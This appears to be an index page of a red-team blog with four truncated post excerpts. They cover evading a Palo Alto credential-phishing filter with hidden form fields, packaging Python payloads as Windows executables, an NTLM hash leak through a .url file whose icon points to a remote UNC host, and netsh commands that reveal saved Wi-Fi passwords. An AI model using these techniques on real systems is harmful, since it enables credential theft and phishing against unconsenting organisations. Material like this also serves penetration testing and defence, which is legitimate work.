Credential Phishing check bypass

Each system, has its limits.The Palo Alto on the latest version (tested on 9.0.1), is checking only up to 21 fields for a coupe of username and password in the bloom field.Normal creds form with 20 hidden INPUT before the Username & Password field. This shows the...

Turn Python scripts into Windows exe file

pyinstaller -i toto.ico -w -F toto.py Medium article : https://medium.com/dreamcatcher-its-blog/making-an-stand-alone-executable-from-a-python-script-using-pyinstaller-d1df9170e263 Another one which I don’t agree, as yes, payload is undetected by execute will...

Provoc NTLM leak

Reading Time: < 1 minutegenerate a file toto.url with the following content [InternetShortcut] URL=https://www.google.com/  IconIndex=0  IconFile=\\1.2.3.4\leak\leak.ico Place the toto.url file on a sharedrive. Many workstations will try to get the ico...

Show stored wifi pwd in Windows

Reading Time: < 1 minutenetsh wlan show profilenetsh wlan show profile name=”mywifi” key=clearor to get the whole list exported to a file powershell.exe netsh wlan show profiles|Select-String -Pattern ” User Profile”|ForEach-Object{echo...